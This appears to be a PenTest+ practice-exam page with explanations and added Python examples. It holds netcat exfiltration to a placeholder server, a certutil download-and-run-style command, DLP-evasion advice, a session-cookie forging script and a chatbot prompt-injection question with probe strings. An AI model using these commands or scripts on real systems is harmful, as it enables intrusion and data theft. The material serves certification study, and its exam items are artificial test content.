Practice Free PT0-003 Exam Online Questions
A tester enumerated a firewall policy and now needs to stage and exfiltrate data captured from the
engagement.
Given the following firewall policy:
Action | SRC                        | DEST                   | Protocol
Block  | 192.168.10.0/24 : 1-65535  | 10.0.0.0/24 : 22       | TCP
Allow  | 0.0.0.0/0 : 1-65535        | 192.168.10.0/24 : 443  | TCP
Allow  | 192.168.10.0/24 : 1-65535  | 0.0.0.0/0 : 443        | TCP
Block  | *                          | *                      | *
Which of the following commands should the tester try next?
- A . tar -zcvf /tmp/data.tar.gz /path/to/data && nc -w 3 <remote_server> 443 < /tmp/data.tar.gz
- B . gzip /path/to/data && cp data.gz <remote_server> 443
- C . gzip /path/to/data && nc -nvlk 443; cat data.gz | nc -w 3 <remote_server> 22
- D . tar -zcvf /tmp/data.tar.gz /path/to/data && scp /tmp/data.tar.gz <remote_server>
A
Explanation:
Given the firewall policy, let’s analyze the commands provided and determine which one is suitable for exfiltrating data through the allowed network traffic. The firewall policy rules are:
Block: Any traffic from 192.168.10.0/24 to 10.0.0.0/24 on port 22 (TCP).
Allow: All traffic (0.0.0.0/0) to 192.168.10.0/24 on port 443 (TCP).
Allow: Traffic from 192.168.10.0/24 to anywhere on port 443 (TCP).
Block: All other traffic (*).
Breakdown of Options:
Option A: tar -zcvf /tmp/data.tar.gz /path/to/data && nc -w 3 <remote_server> 443 < /tmp/data.tar.gz
This command compresses the data into a tar.gz archive and uses nc (netcat) to push it to a remote server on TCP port 443.
The third rule allows TCP from 192.168.10.0/24 to any destination on port 443, so this flow matches an Allow rule before it reaches the final catch-all Block; it is the only option whose network traffic the policy permits. Note that plain nc on port 443 is not TLS: the archive crosses the wire in the clear, so a TLS-inspecting proxy or an IDS on that segment would still see the tar header. The port is allowed, not the protocol.
Option B: gzip /path/to/data && cp data.gz <remote_server> 443
This command compresses the data but attempts to copy it directly to a server, which is not a valid command. The cp command does not support network operations in this manner.
Option C: gzip /path/to/data && nc -nvlk 443; cat data.gz | nc -w 3 <remote_server> 22
This command first starts a persistent listener on port 443 (nc -nvlk); with -k the listener never exits, so the cat after the semicolon would not run anyway. Even if it did, the data goes to <remote_server> on port 22: no Allow rule covers outbound TCP 22, so the connection falls through to the final Block rule.
Option D: tar -zcvf /tmp/data.tar.gz /path/to/data && scp /tmp/data.tar.gz <remote_server>
This command uses scp, which rides on SSH (TCP port 22). No rule allows outbound TCP 22 from 192.168.10.0/24 (the first rule blocks it explicitly toward 10.0.0.0/24 and the final rule blocks it everywhere else), so the transfer fails.
Reference from Pentest:
Gobox HTB: The Gobox write-up emphasizes the use of proper enumeration and leveraging allowed services for exfiltration. Specifically, using tools like nc for data transfer over allowed ports, similar to the method in Option A.
Forge HTB: This write-up also illustrates how to handle firewall restrictions by exfiltrating data through allowed ports and protocols, emphasizing understanding firewall rules and using appropriate commands like curl and nc.
Horizontall HTB: Highlights the importance of using allowed services and ports for data exfiltration. The approach taken in Option A aligns with the techniques used in these practical scenarios where nc is used over an allowed port.
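The rule-matching reasoning in the explanation above, written out as an added Python example (not from the exam or from any of the cited write-ups): it transcribes the policy, evaluates a flow against it first-match with an implicit deny, and reports the verdict for the outbound connection each answer would open. The host address 192.168.10.50, the remote server 203.0.113.10 (a documentation range) and the ephemeral source port are assumptions.

```python
import ipaddress
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    action: str        # "Allow" or "Block"
    src: str           # CIDR, or "*" for any address
    src_ports: tuple   # inclusive (low, high)
    dst: str
    dst_ports: tuple
    proto: str         # "TCP", "UDP" or "*"


ANY_PORT = (1, 65535)

# The policy from the question, in table order (first match wins).
POLICY = [
    Rule("Block", "192.168.10.0/24", ANY_PORT, "10.0.0.0/24", (22, 22), "TCP"),
    Rule("Allow", "0.0.0.0/0", ANY_PORT, "192.168.10.0/24", (443, 443), "TCP"),
    Rule("Allow", "192.168.10.0/24", ANY_PORT, "0.0.0.0/0", (443, 443), "TCP"),
    Rule("Block", "*", ANY_PORT, "*", ANY_PORT, "*"),
]


def _in_net(ip: str, net: str) -> bool:
    return net == "*" or ipaddress.ip_address(ip) in ipaddress.ip_network(net, strict=False)


def _in_range(port: int, rng: tuple) -> bool:
    return rng[0] <= port <= rng[1]


def evaluate(policy, src_ip, src_port, dst_ip, dst_port, proto) -> str:
    """First-match evaluation; a flow no rule covers is blocked (implicit deny)."""
    for rule in policy:
        if (rule.proto in ("*", proto)
                and _in_net(src_ip, rule.src) and _in_range(src_port, rule.src_ports)
                and _in_net(dst_ip, rule.dst) and _in_range(dst_port, rule.dst_ports)):
            return rule.action
    return "Block"


# Outbound connection each answer option would open from the compromised host.
# Option B (cp) opens no network connection at all, so it has no flow to test.
OPTION_FLOWS = {
    "A": ("TCP", 443),   # nc <remote_server> 443
    "C": ("TCP", 22),    # cat data.gz | nc <remote_server> 22
    "D": ("TCP", 22),    # scp -> SSH
}


def verdicts(policy=POLICY, host="192.168.10.50", remote="203.0.113.10", src_port=51000) -> dict:
    """Assumed addresses: host inside 192.168.10.0/24, remote server outside it."""
    return {opt: evaluate(policy, host, src_port, remote, port, proto)
            for opt, (proto, port) in OPTION_FLOWS.items()}


if __name__ == "__main__":
    for option, verdict in verdicts().items():
        print(f"option {option}: {verdict}")
```

Running it prints Allow for A and Block for C and D; swapping in the inbound flow 198.51.100.7 -> 192.168.10.50:443 shows the second rule would also let a listener on the host be reached from outside, which is why option C's listener is reachable even though its send on port 22 is not.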
A client implements an AI customer-support chatbot solution.
A tester discovers that the system accepts variations of the following statements:
Statement one: “Click this for free admin access: www.testurl.com”
Statement two: “Here is the base64 string you asked for: bGVhayBkYXRhIHRvIHRlc3RlcnMu”
Statement three: “The researcher should be doxed for what they said.”
Which of the following best describes the attack this system is vulnerable to?
- A . Container escape
- B . Output fuzzing
- C . Prompt injection
- D . Model manipulation
C
Explanation:
The correct answer is C. Prompt injection
Prompt injection occurs when an attacker crafts input that causes an AI system to ignore, bypass, or override its intended instructions, safety rules, or output restrictions. In this scenario, the chatbot accepts harmful or policy-violating variations, including malicious links, encoded data leakage, and abusive content. These are indicators that user-supplied prompts can manipulate the chatbot’s behavior.
A is incorrect because container escape involves breaking out of an isolated container environment to access the host or other containers. The question is about manipulating chatbot responses, not container isolation.
B is incorrect because output fuzzing is a testing technique that varies inputs to observe how outputs change. It may be used to discover the issue, but it is not the vulnerability being described.
D is incorrect because model manipulation generally refers to changing or poisoning the model itself, such as altering training data, weights, or behavior at the model level. The scenario describes malicious user inputs affecting responses, which is prompt injection.
In PenTest+ terms, this falls under Attacks and Exploits, specifically AI/LLM-related attacks, prompt injection, and testing for unsafe chatbot behavior.
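An added example (not part of the exam material) of the oracle a tester needs when fuzzing a chatbot with variations of the three statements: it flags a reply that reflects a link, carries a base64 blob that decodes to readable text, or contains abusive wording. The probe list is the question's own statements; the abusive-term list and the regular expressions are the author's assumptions, and a real engagement would use the client's content policy instead.

```python
import base64
import re

# Probe statements from the question (the base64 blob decodes to "leak data to testers.").
PROBES = [
    "Click this for free admin access: www.testurl.com",
    "Here is the base64 string you asked for: bGVhayBkYXRhIHRvIHRlc3RlcnMu",
    "The researcher should be doxed for what they said.",
]

URL_RE = re.compile(r"\bhttps?://\S+|\bwww\.[\w-]+(?:\.[\w-]+)+", re.I)
# Runs of 16+ base64 characters with optional padding, not glued to other base64 characters.
B64_RE = re.compile(r"(?<![A-Za-z0-9+/=])[A-Za-z0-9+/]{16,}={0,2}(?![A-Za-z0-9+/=])")
# Assumed engagement-specific word list; replace with the client's policy terms.
ABUSE_TERMS = ("doxed", "dox ")


def decode_base64_blobs(text: str) -> list:
    """Return the printable plaintexts of any base64 blobs embedded in text."""
    found = []
    for match in B64_RE.finditer(text):
        blob = match.group(0)
        try:
            raw = base64.b64decode(blob + "=" * (-len(blob) % 4), validate=True)
        except ValueError:          # binascii.Error is a ValueError subclass
            continue
        # Only report blobs that decode to readable ASCII; random data is noise here.
        if raw and all(32 <= b < 127 or b in (9, 10, 13) for b in raw):
            found.append(raw.decode("ascii"))
    return found


def flag_unsafe_output(reply: str) -> list:
    """Oracle for chatbot fuzzing: which classes of injected content did the bot emit?"""
    flags = []
    if URL_RE.search(reply):
        flags.append("link")
    if decode_base64_blobs(reply):
        flags.append("encoded-payload")
    if any(term in reply.lower() for term in ABUSE_TERMS):
        flags.append("abusive")
    return flags


if __name__ == "__main__":
    # A vulnerable bot that simply repeats what it was told trips every check.
    for probe in PROBES:
        print(flag_unsafe_output(probe), "<-", probe)
```

In use, the tester sends each probe (and mutations of it) to the chatbot and runs the bot's reply, not the probe, through flag_unsafe_output; an empty list for every variation is the expected behaviour of a bot whose instructions hold.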
A penetration tester wants to verify whether passwords from a leaked password list can be used to access an SSH server as a legitimate user.
Which of the following is the most appropriate tool for this task?
- A . BloodHound
- B . Responder
- C . Burp Suite
- D . Hydra
D
Explanation:
The correct answer is D. Hydra
Hydra is a password-attack tool commonly used to test authentication services such as SSH, FTP, Telnet, RDP, HTTP, SMB, and others. In this scenario, the tester has a leaked password list and wants to verify whether any of those passwords can authenticate to an SSH server as a valid user. Hydra is the most appropriate tool because it can automate login attempts against SSH using usernames and password lists.
A is incorrect because BloodHound is used to analyze Active Directory relationships and identify attack paths. It is not used to test SSH logins with password lists.
B is incorrect because Responder is used to capture or poison network authentication traffic, commonly NTLM-related traffic. It is not the best tool for testing leaked passwords against SSH.
C is incorrect because Burp Suite is primarily used for web application testing. While it can test web logins, it is not designed for SSH authentication testing.
In PenTest+ terms, this falls under Attacks and Exploits, specifically password attacks, credential validation, and authentication testing against remote services.
During a testing engagement, a penetration tester compromises a host and locates data for exfiltration.
Which of the following are the best options to move the data without triggering a data loss prevention tool? (Select two).
- A . Move the data using a USB flash drive.
- B . Compress and encrypt the data.
- C . Rename the file name extensions.
- D . Use FTP for exfiltration.
- E . Encode the data as Base64.
- F . Send the data to a commonly trusted service.
B,E
Explanation:
Data Loss Prevention (DLP) tools monitor sensitive data and prevent unauthorized exfiltration.
The two best options to bypass DLP are:
Compress and encrypt the data (Option B):
Compression changes the byte layout so that content signatures (keywords, regular expressions for card or ID numbers) no longer match the stream, and encryption makes the content unreadable to anyone without the key.
DLP tools inspect content against known patterns (e.g., credit card numbers, sensitive keywords). An encrypted file cannot be matched against those patterns at all, because the DLP engine never sees the plaintext; the practical caveat is that some products flag archives they cannot open, so the transfer may still be logged even when the content is not identified.
Reference: CompTIA PenTest+ PT0-003 Official Study Guide – "Data Exfiltration Techniques"
Encode the data as Base64 (Option E):
Base64 encoding turns the bytes into a different ASCII representation, so a signature written for the plaintext does not match the encoded form.
DLP systems that do not normalize encoded text before matching will let it pass; those that decode Base64 first will still catch it, so this is an evasion of signature matching, not a guarantee.
Reference: CompTIA PenTest+ PT0-003 Official Study Guide – "Encoding and Obfuscation in Exfiltration"
Incorrect options:
Option A (USB flash drive): Physical exfiltration is risky and easily detectable in enterprise environments.
Option C (Rename file extensions): DLP systems analyze content, not just filenames.
Option D (FTP for exfiltration): FTP is monitored by security tools and is a high-risk method.
Option F (Trusted service): Many organizations monitor outbound traffic to cloud storage or email services.
A company that uses an insecure corporate wireless network is concerned about security.
Which of the following is the most likely tool a penetration tester could use to obtain initial access?
- A . Responder
- B . Metasploit
- C . Netcat
- D . Nmap
A
Explanation:
Given an insecure wireless network (e.g., open or poorly secured Wi-Fi), a practical initial-access technique is to capture or poison name-resolution and authentication requests from client systems once the tester is on that network. Responder performs LLMNR/NBT-NS/mDNS poisoning and captures NTLM authentication attempts and other credential material on a local network segment. On an insecure Wi-Fi network an attacker can join the network (or stand up a rogue AP) and run Responder to capture credentials from connected clients, a typical and effective initial-access method in such scenarios.
Why not the others:
B. Metasploit: a general exploitation framework; useful after a vulnerable service has been found, but not the most likely first tool on an insecure Wi-Fi network.
C. Netcat: a raw TCP/UDP utility (listeners, shells, file transfer); useful post-exploitation but not for capturing broadcast name-resolution requests.
D. Nmap: a host and port scanner; helpful for reconnaissance, but it does not capture credentials on a local wireless segment.
CompTIA PT0-003 Mapping: Wireless/host-based attacks and network credential-capture techniques (evil twin/rogue AP and LLMNR/NetBIOS poisoning).
During a penetration test, a tester captures information about an SPN account.
Which of the following attacks requires this information as a prerequisite to proceed?
- A . Golden Ticket
- B . Kerberoasting
- C . DCShadow
- D . LSASS dumping
B
Explanation:
Kerberoasting is an attack that specifically targets Service Principal Name (SPN) accounts in a Windows Active Directory environment.
Here's a detailed explanation:
Understanding SPN Accounts:
SPNs are unique identifiers for services in a network that allow Kerberos clients to request tickets for, and authenticate to, those services. In Active Directory an SPN is registered on the account that runs the service (SQL Server, IIS, etc.); an SPN tied to a user account rather than a computer account is the usual Kerberoasting target, because user passwords are what get cracked.
Kerberoasting Attack:
Prerequisite: Knowledge of the SPN account.
Process: Any authenticated domain user can request a service ticket (TGS) for the SPN. Part of that ticket is encrypted with a key derived from the service account's password (the NT hash when RC4, etype 23, is used; an AES key when etype 17/18 is negotiated). The attacker extracts the ticket and cracks it offline against a wordlist, without ever sending a guess to the domain controller.
Objective: To obtain the plaintext password of the service account, which can then be used for lateral movement or privilege escalation.
Comparison with Other Attacks:
Golden Ticket: Forges Kerberos TGTs with the KRBTGT account's key, which first requires domain-admin-level access (for example a DCSync or a copy of NTDS.dit), not SPN information.
DCShadow: Involves manipulating Active Directory data by impersonating a domain controller, typically requiring high privileges.
LSASS Dumping: Involves extracting credentials from the LSASS process on a Windows machine, often requiring local admin privileges.
Kerberoasting specifically requires the SPN account information to proceed, making it the correct answer.
A penetration tester needs to use the native binaries on a system in order to download a file from the internet and evade detection.
Which of the following tools would the tester most likely use?
- A . netsh.exe
- B . certutil.exe
- C . nc.exe
- D . cmdkey.exe
B
Explanation:
Certutil.exe for File Downloads:
certutil.exe is a native Windows utility primarily used for managing certificates but can also be leveraged to download files from the internet.
Example command:
certutil.exe -urlcache -split -f http://example.com/file.exe file.exe
Because certutil.exe is a signed, native Microsoft binary (a "living off the land" binary), running it does not by itself stand out the way an uploaded tool would. The caveat for the tester: this download pattern is well known, and many EDR products alert on certutil invoked with -urlcache -f, so it may still be logged.
Why Not Other Options?
A (netsh.exe): Used for network configuration but not for downloading files.
C (nc.exe): Netcat is not native to Windows and would need to be introduced to the system.
D (cmdkey.exe): Used for managing stored credentials, not downloading files.
CompTIA PenTest+ Reference: Domain 3.0 (Attacks and Exploits)
Which of the following techniques is the best way to avoid detection by Data Loss Prevention (DLP) tools?
- A . Encoding
- B . Compression
- C . Encryption
- D . Obfuscation
C
Explanation:
Data Loss Prevention (DLP) tools monitor network traffic and files for sensitive information leaks. The most effective way to bypass DLP is to use encryption, since DLP systems cannot inspect encrypted content.
Option A (Encoding) ❌ : Base64 or Hex encoding can sometimes bypass filters, but many DLP tools detect common encoding schemes.
Option B (Compression) ❌ : Compression can change file signatures, but modern DLP systems can inspect compressed files.
Option C (Encryption) ✅ : Correct.
Strong encryption prevents DLP tools from analyzing file contents.
Option D (Obfuscation) ❌ : Code obfuscation may work for source code leaks, but DLP solutions use heuristics to detect patterns.
Reference: CompTIA PenTest+ PT0-003 Official Guide – "Bypassing Security Controls"
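An added Python example (not from the study guide) that serves both DLP questions above, the select-two question and this one: it runs a naive signature-based DLP check over a constructed file, then over the same bytes after renaming, Base64 encoding and compression, and finally shows the caveat with a content-aware scanner that undoes the encoding before matching. The sample record, the SSN and card values in it, and the two signatures are all constructed for the example; encryption is not implemented here because, unlike the other two transformations, nothing the scanner can do reverses it without the key.

```python
import base64
import re
import zlib

# Constructed sample file: the SSN and card number are made-up test values.
DOCUMENT = b"Customer record\nSSN: 123-45-6789\nCard: 4111 1111 1111 1111\n"

# Signatures a naive DLP engine applies to the raw bytes it sees.
SIGNATURES = {
    "ssn": re.compile(rb"\b\d{3}-\d{2}-\d{4}\b"),
    "card": re.compile(rb"\b(?:\d{4}[ -]?){3}\d{4}\b"),
}


def dlp_scan(data: bytes) -> set:
    """Signature-only DLP check: names of the patterns found in the raw bytes."""
    return {name for name, rx in SIGNATURES.items() if rx.search(data)}


def transform(data: bytes, method: str) -> bytes:
    """Apply one of the evasions from the question to the file contents."""
    if method == "rename":      # option C: only the extension changes, the bytes do not
        return data
    if method == "base64":      # option E
        return base64.b64encode(data)
    if method == "compress":    # the compression half of option B
        return zlib.compress(data, 9)
    raise ValueError(f"unknown method {method!r}")


def compare_evasions(data: bytes = DOCUMENT) -> dict:
    """Which signatures still fire after each transformation?"""
    return {m: dlp_scan(transform(data, m)) for m in ("rename", "base64", "compress")}


def dlp_scan_normalized(data: bytes) -> set:
    """Content-aware DLP: try to undo Base64 and zlib, then scan the result as well.
    This is the caveat to options B and E: an engine that normalizes its input
    recovers the plaintext, so only encryption keeps the content out of reach."""
    hits = dlp_scan(data)
    try:
        hits |= dlp_scan(base64.b64decode(data, validate=True))
    except ValueError:
        pass
    try:
        hits |= dlp_scan(zlib.decompress(data))
    except zlib.error:
        pass
    return hits


if __name__ == "__main__":
    for method, hits in compare_evasions().items():
        print(f"{method:9s} naive={sorted(hits)} "
              f"normalized={sorted(dlp_scan_normalized(transform(DOCUMENT, method)))}")
```

The naive scanner fires on the renamed file and on nothing else, which is the reasoning behind B and E; the normalized scanner fires on all three, which is why a tester treats encoding and compression as a bypass of one class of product rather than of DLP in general.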
During the reconnaissance phase, a penetration tester collected the following information from the DNS records:
A -> www
A -> host
TXT -> vpn.comptia.org
SPF -> ip=2.2.2.2
Which of the following DNS records should be in place to avoid phishing attacks using spoofing domain techniques?
- A . MX
- B . SOA
- C . DMARC
- D . CNAME
C
Explanation:
DMARC (Domain-based Message Authentication, Reporting & Conformance) is an email authentication protocol that helps prevent email spoofing and phishing. It builds on SPF (Sender Policy Framework) and DKIM (DomainKeys Identified Mail) to provide a mechanism for email senders and receivers to improve and monitor the protection of the domain from fraudulent email.
Understanding DMARC:
SPF: Defines which IP addresses are allowed to send emails on behalf of a domain.
DKIM: Provides a way to check that an email claiming to come from a specific domain was indeed authorized by the owner of that domain.
DMARC: Uses SPF and DKIM to determine the authenticity of an email and specifies what action to take if the email fails the authentication checks.
Implementing DMARC:
Create a DMARC policy in your DNS records. This policy can specify to reject, quarantine, or take no action on emails that fail SPF or DKIM checks.
Example DMARC record: v=DMARC1; p=reject; rua=mailto:[email protected];
Benefits of DMARC:
Helps to prevent email spoofing and phishing attacks.
Provides visibility into email sources through reports.
Enhances domain reputation by ensuring only legitimate emails are sent from the domain.
DMARC Record Components:
v: Version of DMARC.
p: Policy for handling emails that fail the DMARC check (none, quarantine, reject).
rua: Reporting URI for aggregate reports.
ruf: Reporting URI for forensic (failure) reports.
pct: Percentage of failing messages the policy is applied to.
Real-World Example:
A company sets up a DMARC policy with p=reject to ensure that any emails failing SPF or DKIM
checks are rejected outright, significantly reducing the risk of phishing attacks using their domain.
Reference from Pentesting Literature:
In "Penetration Testing – A Hands-on Introduction to Hacking," DMARC is mentioned as part of email security protocols to prevent phishing.
HTB write-ups often highlight the importance of DMARC in securing email communications and preventing spoofing attacks.
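An added Python example (not from the exam or the cited books) of the check a tester runs once the DMARC TXT record for _dmarc.<domain> has been pulled from DNS: it parses the tag=value pairs and reports the weaknesses that still leave the domain spoofable (no record, p=none or quarantine, a weaker subdomain policy, partial pct, no aggregate reporting). The sample records and the mailto:dmarc@example.com address are constructed; the DNS lookup itself is left out so the block runs offline.

```python
VALID_POLICIES = ("none", "quarantine", "reject")   # weakest to strongest


def parse_dmarc(record: str) -> dict:
    """Split a DMARC TXT record ('v=DMARC1; p=reject; ...') into its tags."""
    tags = {}
    for part in record.split(";"):
        part = part.strip()
        if not part:
            continue
        if "=" not in part:
            raise ValueError(f"malformed DMARC tag: {part!r}")
        key, value = part.split("=", 1)
        tags[key.strip().lower()] = value.strip()
    if tags.get("v", "").upper() != "DMARC1":
        raise ValueError("not a DMARC record: first tag must be v=DMARC1")
    return tags


def assess_dmarc(record) -> dict:
    """Findings a tester would report, keyed by the tag at fault; empty means nothing to report.
    Pass None when the _dmarc TXT lookup returned nothing."""
    if record is None:
        return {"missing": "no DMARC record published; SPF/DKIM failures carry no enforced policy"}
    tags = parse_dmarc(record)
    findings = {}

    policy = tags.get("p")
    if policy is None:
        findings["p"] = "p tag missing; receivers treat the record as p=none at best"
        policy = "none"
    elif policy not in VALID_POLICIES:
        findings["p"] = f"unknown policy {policy!r}"
    elif policy == "none":
        findings["p"] = "p=none only monitors; spoofed mail is still delivered"
    elif policy == "quarantine":
        findings["p"] = "p=quarantine sends spoofed mail to spam instead of rejecting it"

    # Subdomains inherit p unless sp overrides it; flag sp only when it is weaker than p.
    sub_policy = tags.get("sp")
    if (sub_policy in VALID_POLICIES and policy in VALID_POLICIES
            and VALID_POLICIES.index(sub_policy) < VALID_POLICIES.index(policy)):
        findings["sp"] = f"sp={sub_policy}: subdomains get a weaker policy than the organizational domain"

    pct = int(tags.get("pct", "100"))
    if pct < 100:
        findings["pct"] = f"pct={pct}: only {pct}% of failing messages have the policy applied"

    if "rua" not in tags:
        findings["rua"] = "no rua address: no aggregate reports, so spoofing attempts go unseen"
    return findings


if __name__ == "__main__":
    # Constructed records, from the posture the explanation recommends to a monitoring-only one.
    for sample in ("v=DMARC1; p=reject; rua=mailto:dmarc@example.com",
                   "v=DMARC1; p=none; rua=mailto:dmarc@example.com",
                   "v=DMARC1; p=reject; sp=none; pct=50",
                   None):
        print(sample, "->", assess_dmarc(sample))
```

The first record is the p=reject posture from the Real-World Example above and yields no findings; the others show how a record that exists can still leave the domain usable for phishing.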
A penetration tester conducts a web application assessment and receives the following Set-Cookie upon logging in:
Set-Cookie: auth=UGVudGVzdFVzZXI6OTE1MzYK
Upon analysis, the penetration tester determines this is a Base64-encoded string, which when decoded reads:
PentestUser:91536
The penetration tester logs out, logs back in, and sees the decoded string now reads:
PentestUser:91944
Which of the following attacks will the penetration tester most likely conduct based on this information?
- A . Collision attack
- B . JWT manipulation
- C . Session hijacking
- D . Insecure direct object reference
C
Explanation:
The correct answer is C. Session hijacking
The cookie value is only Base64 encoded, not encrypted or cryptographically protected. When decoded, it reveals a username and a numeric value:
PentestUser:91536
After logging in again, the numeric value changes:
PentestUser:91944
The value is a username plus a number that moved from 91536 to 91944 (a difference of 408) across two logins, which suggests the application stores a session identifier in a readable and possibly sequential format with no integrity protection. A penetration tester would most likely collect more samples to see whether the number is predictable, then test whether a guessed, modified or replayed value is accepted as another user's session. That attack is session hijacking.
A is incorrect because a collision attack involves finding two different inputs that produce the same hash value. This scenario does not involve hash collision testing.
B is incorrect because JWT manipulation applies to JSON Web Tokens, which typically have three Base64URL-encoded sections separated by periods, such as header.payload.signature. The cookie shown is not a JWT.
D is incorrect because insecure direct object reference involves manipulating object identifiers, such as account IDs, invoice numbers, or file IDs, to access unauthorized resources. The issue here is related to authentication/session handling, not direct object access.
In PenTest+ terms, this falls under Attacks and Exploits, specifically web application attacks involving weak session management, predictable session tokens, and session hijacking.
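An added Python example (not part of the exam material) of the analysis the explanation describes: decode the observed cookie, rebuild the second login's cookie in the same format, measure the step between session numbers, and generate the candidate cookies a tester would replay to confirm the hijack. The second cookie is reconstructed from the decoded value the question gives; the "admin" target name in the usage is an assumption, and replaying forged values is only done against accounts the client has put in scope.

```python
import base64

OBSERVED_COOKIE = "UGVudGVzdFVzZXI6OTE1MzYK"   # the Set-Cookie value from the question


def decode_auth_cookie(cookie: str) -> tuple:
    """Base64-decode a 'user:number' cookie (trailing newline tolerated) into (user, number)."""
    user, sep, number = base64.b64decode(cookie).decode("ascii").strip().partition(":")
    if not sep or not number.isdigit():
        raise ValueError("cookie is not in the user:number form")
    return user, int(number)


def encode_auth_cookie(user: str, number: int) -> str:
    """Rebuild a cookie in the same format, newline included, as the observed value has one."""
    return base64.b64encode(f"{user}:{number}\n".encode("ascii")).decode("ascii")


def token_deltas(cookies: list) -> list:
    """Differences between successive session numbers; a constant or small delta is the red flag."""
    numbers = [decode_auth_cookie(c)[1] for c in cookies]
    return [b - a for a, b in zip(numbers, numbers[1:])]


def candidate_cookies(latest: str, step: int, count: int, user: str = None) -> list:
    """Forge cookies for the next `count` session numbers, optionally under another username.
    These are the values replayed (in scope only) to test whether the server accepts them."""
    observed_user, number = decode_auth_cookie(latest)
    target = user if user is not None else observed_user
    return [encode_auth_cookie(target, number + step * i) for i in range(1, count + 1)]


if __name__ == "__main__":
    first = OBSERVED_COOKIE
    second = encode_auth_cookie("PentestUser", 91944)     # second login from the question
    print(decode_auth_cookie(first), decode_auth_cookie(second))
    print("delta between logins:", token_deltas([first, second]))
    for cookie in candidate_cookies(second, 408, 3, user="admin"):
        print(cookie, decode_auth_cookie(cookie))
```

Two samples give one delta, which is not yet evidence of predictability; the tester logs in several more times, checks whether the deltas stay regular (or whether the number tracks time or a server-side counter), and only then replays candidates. Because the cookie carries the username in the clear, the same forgery also covers swapping the user while keeping a plausible number.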
